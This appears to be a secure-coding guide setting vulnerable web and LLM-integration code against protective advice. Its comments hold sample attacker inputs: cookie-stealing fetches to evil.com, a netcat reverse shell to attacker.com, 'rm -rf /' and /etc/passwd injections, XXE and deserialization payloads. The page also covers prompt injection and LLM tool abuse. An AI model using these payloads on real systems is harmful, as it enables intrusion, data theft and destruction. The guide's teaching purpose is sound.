Secure Code Examples
Learn from real-world vulnerable vs. secure code patterns. Copy secure implementations directly into your projects.
Prevent SQL injection by using parameterized queries instead of string concatenation.
// VULNERABLE - String concatenation
async function getUser(userId: string) {
const query = `SELECT * FROM users WHERE id = '${userId}'`;
const result = await db.query(query);
return result.rows[0];
}
// Attacker input: ' OR '1'='1' --
// Resulting query: SELECT * FROM users WHERE id = '' OR '1'='1' --'Why This Matters
Parameterized queries separate SQL code from data, preventing attackers from injecting malicious SQL. ORMs provide an additional layer of protection by abstracting database queries.
Prevent XSS attacks by properly sanitizing and encoding user input.
// VULNERABLE - Directly inserting user content
function Comment({ content }: { content: string }) {
return (
<div dangerouslySetInnerHTML={{ __html: content }} />
);
}
// Attacker input: <script>document.cookie</script>
// or: <img src=x onerror="fetch('https://evil.com?c='+document.cookie)">Why This Matters
React automatically escapes content rendered with JSX expressions. When HTML rendering is required, use a trusted sanitization library like DOMPurify to strip dangerous elements and attributes.
Properly hash passwords using bcrypt instead of weak algorithms.
// VULNERABLE - Weak hashing
import crypto from 'crypto';
function hashPassword(password: string): string {
return crypto.createHash('md5').update(password).digest('hex');
}
// Problems:
// - MD5 is fast (millions of hashes/sec)
// - No salt (rainbow table attacks)
// - No key stretchingWhy This Matters
Bcrypt is designed for password hashing with built-in salt generation and configurable work factor. The cost factor (salt rounds) makes brute-force attacks computationally expensive.
Protect against Cross-Site Request Forgery attacks with tokens and SameSite cookies.
// VULNERABLE - No CSRF protection
app.post('/api/transfer', async (req, res) => {
const { to, amount } = req.body;
// No verification that request originated from our app
await transferFunds(req.user.id, to, amount);
res.json({ success: true });
});
// Attacker's page:
// <form action="https://bank.com/api/transfer" method="POST">
// <input name="to" value="attacker" />
// <input name="amount" value="10000" />
// </form>
// <script>document.forms[0].submit()</script>Why This Matters
CSRF tokens ensure that form submissions originate from your application. Combined with SameSite cookies, they provide robust protection against cross-site request forgery attacks.
Prevent directory traversal attacks when handling file paths.
Why This Matters
Always resolve file paths to their absolute form and verify they remain within the intended directory. Use path.basename() to strip directory components and check the resolved path prefix.
Implement JWT tokens securely with proper validation, expiration, and storage.
// VULNERABLE - Poor JWT implementation
import jwt from 'jsonwebtoken';
// Using 'none' algorithm
const token = jwt.sign(payload, '', { algorithm: 'none' });
// Weak secret
const token2 = jwt.sign(payload, 'secret123');
// No expiration
const token3 = jwt.sign({ userId: '123' }, SECRET);
// Storing in localStorage (XSS vulnerable)
localStorage.setItem('token', token);Why This Matters
Use strong secrets, explicit algorithms, short expiration times, and httpOnly cookies. Never use the 'none' algorithm and always validate the algorithm during verification.
Prevent SSRF attacks where attackers abuse server functionality to access internal resources.
// VULNERABLE - No URL validation
app.post('/api/fetch-url', async (req, res) => {
const { url } = req.body;
// Attacker sends: http://169.254.169.254/latest/meta-data/
// or: http://localhost:6379/
const response = await fetch(url);
const data = await response.text();
res.json({ data });
});
// Attacker can:
// - Access AWS metadata (steal IAM credentials)
// - Scan internal network (port scanning)
// - Read internal services (Redis, Elasticsearch)
// - Access cloud provider APIsWhy This Matters
SSRF allows attackers to make the server perform requests to unintended locations. Validate URLs against an allowlist, block private/internal IPs, restrict protocols to HTTP/HTTPS, and disable redirects to prevent bypasses.
Prevent unauthorized access to resources by properly checking object ownership and permissions.
// VULNERABLE - No authorization check
app.get('/api/invoices/:id', async (req, res) => {
const invoice = await Invoice.findById(req.params.id);
res.json(invoice);
});
// Attacker changes /api/invoices/123 to /api/invoices/456
// and gets another user's invoice data
app.delete('/api/users/:id', async (req, res) => {
await User.findByIdAndDelete(req.params.id);
res.json({ message: 'User deleted' });
});
// Any authenticated user can delete any other user!Why This Matters
IDOR occurs when applications expose internal object references without authorization checks. Always verify resource ownership, use scoped queries that filter by the authenticated user, and enforce role-based access for sensitive operations.
Prevent command injection by avoiding shell execution with user-controlled input.
// VULNERABLE - User input in shell command
import { exec } from 'child_process';
app.post('/api/ping', (req, res) => {
const { host } = req.body;
exec(`ping -c 4 ${host}`, (error, stdout) => {
res.json({ output: stdout });
});
});
// Attacker input: "8.8.8.8; cat /etc/passwd"
// Attacker input: "8.8.8.8 && rm -rf /"
// Attacker input: "8.8.8.8 | nc attacker.com 4444 -e /bin/sh"
// VULNERABLE - Template literal in exec
app.post('/api/convert', (req, res) => {
const { filename } = req.body;
exec(`ffmpeg -i uploads/${filename} output.mp4`);
});Why This Matters
Command injection occurs when user input is passed to shell commands. Use execFile() instead of exec() to avoid shell interpretation. Better yet, use native libraries instead of spawning system commands.
Prevent XXE attacks that exploit XML parsers to read files, perform SSRF, or cause denial of service.
// VULNERABLE - Default XML parser settings
import { parseString } from 'xml2js';
app.post('/api/parse-xml', (req, res) => {
// Default settings allow external entities
parseString(req.body, (err, result) => {
res.json(result);
});
});
// Malicious XML payload:
// <?xml version="1.0"?>
// <!DOCTYPE foo [
// <!ENTITY xxe SYSTEM "file:///etc/passwd">
// ]>
// <data>&xxe;</data>
//
// Billion Laughs DoS:
// <!ENTITY a "AAAA...">
// <!ENTITY b "&a;&a;&a;&a;&a;"> (exponential expansion)Why This Matters
XXE attacks exploit XML parsers that process external entity references. Disable DTD processing and external entities, reject DOCTYPE declarations, limit input size, and prefer JSON or safe XML parsers.
Prevent insecure deserialization attacks that can lead to remote code execution.
// VULNERABLE - Deserializing untrusted data
import { serialize, deserialize } from 'node-serialize';
app.post('/api/session', (req, res) => {
// Directly deserializing user-controlled cookie
const sessionData = deserialize(
Buffer.from(req.cookies.session, 'base64').toString()
);
res.json(sessionData);
});
// Attacker crafts:
// {"cmd":"_$$ND_FUNC$$_function(){require('child_process')
// .exec('rm -rf /')}()"}
// VULNERABLE - Using eval for JSON parsing
const data = eval('(' + userInput + ')');
// VULNERABLE - YAML deserialization
import yaml from 'js-yaml';
const config = yaml.load(userInput); // Can execute arbitrary codeWhy This Matters
Never deserialize untrusted data with libraries that can execute code. Use JSON.parse for deserialization, validate with schema libraries like Zod, use safe YAML loading, and sign data to detect tampering.
Implement essential HTTP security headers to protect against common web attacks.
// VULNERABLE - No security headers
// Default Next.js config with no headers
const nextConfig = {};
// No Content-Security-Policy = XSS risk
// No X-Frame-Options = Clickjacking risk
// No Strict-Transport-Security = Downgrade attacks
// No X-Content-Type-Options = MIME sniffing
// No Referrer-Policy = Information leakage
// No Permissions-Policy = Feature abuse
// Response headers:
// HTTP/1.1 200 OK
// Content-Type: text/html
// (No security headers at all)Why This Matters
Security headers provide defense-in-depth against XSS, clickjacking, MIME sniffing, protocol downgrade, and other attacks. Always configure CSP, HSTS, X-Frame-Options, and Referrer-Policy in production.
Implement rate limiting to prevent brute force attacks, credential stuffing, and API abuse.
Why This Matters
Rate limiting prevents brute force attacks, credential stuffing, and API abuse. Use tiered limits (stricter for auth), account lockout after failures, and Redis-backed stores for distributed systems. Never reveal whether an email exists.
Prevent open redirect attacks where attackers abuse URL redirect parameters for phishing.
// VULNERABLE - Unvalidated redirect
app.get('/redirect', (req, res) => {
const { url } = req.query;
// Attacker: /redirect?url=https://evil-phishing.com/login
res.redirect(url as string);
});
// In frontend:
function LoginRedirect() {
const params = new URLSearchParams(window.location.search);
const redirectTo = params.get('redirect') || '/';
// After login, redirects to attacker's site
window.location.href = redirectTo;
}
// Common exploitation:
// /login?redirect=https://evil.com/fake-login
// /auth/callback?next=//evil.com
// /redirect?url=javascript:alert(document.cookie)Why This Matters
Open redirect vulnerabilities allow attackers to redirect users to malicious sites using legitimate URLs. Validate redirect URLs against an allowlist, only permit relative paths, and block protocol-relative URLs (//).
Prevent attackers from modifying unauthorized fields by controlling which properties can be updated.
// VULNERABLE - Spreading all request body fields
app.put('/api/profile', async (req, res) => {
// User sends: { name: "John", role: "admin", verified: true }
await User.findByIdAndUpdate(req.user.id, req.body);
res.json({ message: 'Profile updated' });
});
// Mongoose/Prisma: updating with unfiltered input
app.post('/api/register', async (req, res) => {
const user = new User(req.body);
// Attacker adds: { isAdmin: true, subscriptionTier: "enterprise" }
await user.save();
res.json(user);
});
// GraphQL mutation with spread
const resolvers = {
Mutation: {
updateUser: (_, args) => User.update({ ...args }),
},
};Why This Matters
Mass assignment occurs when an API blindly accepts all user-submitted fields for database operations. Use explicit allow-lists or schema validation (Zod, Joi) to control exactly which fields can be modified by each endpoint.
Protect sensitive data in transit, at rest, in logs, and in API responses.
// VULNERABLE - Exposing sensitive data in API response
app.get('/api/users/:id', async (req, res) => {
const user = await User.findById(req.params.id);
// Returns password hash, SSN, internal IDs, etc.
res.json(user);
});
// VULNERABLE - Logging sensitive data
console.log('Login attempt:', { email, password });
console.log('Payment:', { cardNumber, cvv, amount });
// VULNERABLE - Sensitive data in URL
app.get('/api/reset-password?token=abc123&email=user@example.com');
// Tokens visible in browser history, server logs, referrer headers
// VULNERABLE - Error messages reveal internals
app.use((err, req, res, next) => {
res.status(500).json({
error: err.message,
stack: err.stack, // Reveals file paths, line numbers
query: err.query, // Reveals database queries
});
});Why This Matters
Never expose internal data in API responses, logs, URLs, or error messages. Use DTO patterns to explicitly select response fields, redact sensitive data from logs, and return generic error messages to clients.
Secure session management with proper cookie settings, session fixation prevention, and token rotation.
// VULNERABLE - Weak session management
import session from 'express-session';
app.use(session({
secret: 'keyboard-cat', // Weak, hardcoded secret
resave: true,
saveUninitialized: true, // Creates session for every visitor
cookie: {
// No secure flag — sent over HTTP
// No httpOnly — accessible via JavaScript
// No maxAge — session never expires
// No sameSite — CSRF vulnerable
}
}));
// Session fixation — no regeneration after login
app.post('/login', async (req, res) => {
const user = await authenticate(req.body);
if (user) {
req.session.userId = user.id; // Same session ID reused
res.json({ success: true });
}
});Why This Matters
Use strong secrets, secure cookie flags, session regeneration after login, absolute timeouts, and server-side session stores. The __Host- cookie prefix provides additional security guarantees in modern browsers.
Use strong, modern cryptographic algorithms instead of broken or weak ones.
// VULNERABLE - Weak cryptography
import crypto from 'crypto';
// Using deprecated/broken algorithms
const hash = crypto.createHash('md5').update(data).digest('hex');
const hash2 = crypto.createHash('sha1').update(data).digest('hex');
// ECB mode — reveals patterns in encrypted data
const cipher = crypto.createCipheriv('aes-128-ecb', key, null);
// Hardcoded encryption key
const ENCRYPTION_KEY = 'mySecretKey12345';
// Using Math.random for security-sensitive operations
const resetToken = Math.random().toString(36).substring(2);
const otp = Math.floor(Math.random() * 999999);
// Insecure key derivation
const key = crypto.createHash('sha256')
.update(password).digest();Why This Matters
Use SHA-256+ for hashing, AES-256-GCM for encryption (provides confidentiality + integrity), crypto.randomBytes for random values, and PBKDF2/scrypt for key derivation. Never use MD5, SHA1, ECB mode, Math.random, or hardcoded keys.
Prevent prototype pollution attacks that modify JavaScript object prototypes to inject malicious properties.
// VULNERABLE - Deep merge without sanitization
function deepMerge(target: any, source: any): any {
for (const key in source) {
if (typeof source[key] === 'object' && source[key] !== null) {
target[key] = target[key] || {};
deepMerge(target[key], source[key]);
} else {
target[key] = source[key];
}
}
return target;
}
// Attacker sends:
// { "__proto__": { "isAdmin": true } }
const userConfig = deepMerge({}, req.body);
// Now ALL objects have isAdmin = true!
// Vulnerable query string parsing:
// ?__proto__[isAdmin]=true
// or: ?constructor[prototype][isAdmin]=true
// Check later in code:
if (user.isAdmin) { /* Attacker gains admin access */ }Why This Matters
Prototype pollution occurs when attackers inject properties into Object.prototype via __proto__ or constructor.prototype. Filter dangerous keys, use Object.create(null), prefer Map over objects, and validate input with strict schemas.
Securely handle file uploads to prevent malicious file execution, path traversal, and storage abuse.
// VULNERABLE - Unrestricted file upload
import multer from 'multer';
const upload = multer({ dest: 'public/uploads/' });
app.post('/upload', upload.single('file'), (req, res) => {
// No file type validation
// No file size limit
// Stored in publicly accessible directory
// Original filename used (path traversal risk)
const filePath = `public/uploads/${req.file.originalname}`;
fs.renameSync(req.file.path, filePath);
res.json({ url: `/uploads/${req.file.originalname}` });
});
// Attacker uploads:
// - webshell.php → Remote code execution
// - ../../../etc/cron.d/backdoor → Path traversal
// - bomb.zip (42 bytes → 4.5 PB) → Zip bomb DoS
// - malware.exe.jpg → Executable disguised as imageWhy This Matters
Validate file types using magic bytes (not extensions), limit file size, generate random filenames, store outside the public directory, and serve files through authenticated routes. Never trust client-provided filenames or MIME types.
Prevent prompt injection attacks where user input overrides LLM system instructions.
Why This Matters
Defend against prompt injection using multiple layers: (1) regex-based input scanning for known injection patterns, (2) separate system/user message roles instead of string concatenation, (3) strict system prompt rules with explicit refusal instructions, (4) output validation to catch leaked sensitive content, (5) rate limiting per user, and (6) security event logging. No single defense is sufficient — always layer multiple controls.
Prevent personally identifiable information from leaking through LLM prompts or responses.
// VULNERABLE: User data sent directly to LLM with no redaction
async function summarizeCustomerTicket(ticket: CustomerTicket) {
const prompt = `Summarize this support ticket:
Name: ${ticket.customerName}
Email: ${ticket.email}
Phone: ${ticket.phone}
SSN: ${ticket.ssn}
Message: ${ticket.message}`;
// PII goes straight to the model API — stored in logs,
// potentially used in training, visible to API provider
const response = await openai.chat.completions.create({
model: "gpt-4",
messages: [{ role: "user", content: prompt }],
});
return response.choices[0].message.content;
}Why This Matters
Never send raw PII to LLM APIs. Use regex-based detection to redact sensitive data (SSN, email, phone, credit cards) before the API call. For fields like SSN, don't include them at all. After the LLM responds, scan the output for any PII that may have leaked. Store a mapping table only in memory for the request lifecycle — never log PII. This approach prevents data exposure through API provider logs, model training, and response leakage.
Prevent excessive agency attacks where LLMs abuse tool/function calling to perform unauthorized actions.
// VULNERABLE: LLM has unrestricted tool access
const tools = [
{
type: "function",
function: {
name: "execute_sql",
description: "Execute any SQL query",
parameters: { type: "object", properties: { query: { type: "string" } } },
},
},
{
type: "function",
function: {
name: "send_email",
description: "Send an email to anyone",
parameters: {
type: "object",
properties: {
to: { type: "string" },
subject: { type: "string" },
body: { type: "string" },
},
},
},
},
];
// No validation — LLM can run any SQL, email anyone
async function handleToolCall(toolCall: any) {
if (toolCall.function.name === "execute_sql") {
const args = JSON.parse(toolCall.function.arguments);
return await db.query(args.query); // SQL injection + unrestricted access!
}
if (toolCall.function.name === "send_email") {
const args = JSON.parse(toolCall.function.arguments);
return await sendEmail(args.to, args.subject, args.body); // Spam/phishing!
}
}Why This Matters
LLM tool/function calling is a major attack vector (OWASP LLM06 — Excessive Agency). Defend with: (1) explicit tool allowlists instead of open access, (2) role-based access control per tool, (3) argument validation with strict schemas, (4) rate limiting per user/tool, (5) human-in-the-loop approval for destructive actions like refunds or deletions, and (6) comprehensive audit logging. Never give the LLM direct database access or the ability to send arbitrary communications.
Sanitize LLM outputs before rendering to prevent XSS, harmful content, and hallucinated URLs.
// VULNERABLE: LLM output rendered directly as HTML
app.post("/api/chat", async (req, res) => {
const { message } = req.body;
const completion = await openai.chat.completions.create({
model: "gpt-4",
messages: [{ role: "user", content: message }],
});
const aiResponse = completion.choices[0].message.content;
// Directly inserting AI output into HTML — XSS risk!
// LLM could generate: <script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>
// Or: <img src=x onerror="alert('XSS')">
res.json({ html: aiResponse });
});
// Client side
function ChatMessage({ html }) {
// dangerouslySetInnerHTML with unvalidated AI output!
return <div dangerouslySetInnerHTML={{ __html: html }} />;
}Why This Matters
LLM outputs should never be trusted — they can contain XSS payloads, hallucinated URLs (potential phishing), or harmful content. Sanitize with: (1) pattern matching to detect script injection, (2) URL allowlisting to flag hallucinated links, (3) DOMPurify with a strict tag allowlist (no scripts, no event handlers, no iframes), (4) server-side sanitization before sending to the client, and (5) client-side double-sanitization as defense in depth. Instruct the model to use plain text/markdown, but never rely on it — always sanitize.